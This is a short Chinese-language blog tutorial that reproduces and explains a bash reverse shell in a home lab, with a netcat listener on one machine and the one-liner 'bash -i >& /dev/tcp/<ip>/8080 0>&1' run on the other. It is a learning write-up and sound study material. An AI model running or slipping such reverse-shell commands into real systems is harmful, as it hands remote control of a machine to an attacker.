首页 > 系统服务 > 详细

bash反弹shell

时间:2021-09-21 16:36:41      阅读:32      评论:0      收藏:0      [点我收藏+]

part1:不求甚解的本地复现

  攻击端Debian 10.x:技术分享图片  192.168.208.134

 

  受害端Ubuntu :技术分享图片 192.168.208.135

 

 

攻击端打开(监听)某端口:技术分享图片  

  键入命令:【nc -lvp 8080】

 

受害端执行反弹shell:技术分享图片 

 

  键入命令:【bash -i >& /dev/tcp/192.168.208.134/8080 0>&1】

 

效果:技术分享图片

 

       可以在攻击机上操作受害机的终端。

 

 

part2:尝试理解原理

    (1) nc -lvp 8080

       -l  设置netcat处于监听状态等待连接。

       -v  显示错误提示信息(非必须)

       -p 设置本地监听的端口号

    (2) bash -i >& dev/tcp/192.168.208.134/8080 0>&1

        -i  创建一个交互式的shell.

          0,stdin,标准输入(一般是键盘)
          1,stdout,标准输出(一般是显示屏,准确的说是用户终端控制台)
          2,stderr,标准错误(出错信息输出)

        > 输出重定向;指定具体的输出目标以替换默认的标准输出。

            eg:技术分享图片

 

         >&:将联合符号前面的内容与后面相结合然后一起重定向给后者。

         dev/tcp/192.168.208.134/8080(dev/tcp/ip/port):linux里一切皆文件;这个东西也看做文件(但不能访问),其作用是让本机与目标主机通过指定端口建立tcp连接。

 


整体解读的话,就是:

  bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,并重定向给tcp 8080会话连接;(这个具体咋回事估计得等再学点东西才能理解)

       用户键盘输入与用户标准输出相结合,并重定向给一个标准的输出;(这就是效果图中ls出现两次的原因;第二次是因为标准输入也被重定向给了标准输出,输出出来了)

  即得到一个bash 反弹环境。

bash反弹shell

原文:https://www.cnblogs.com/hiddener/p/15312188.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!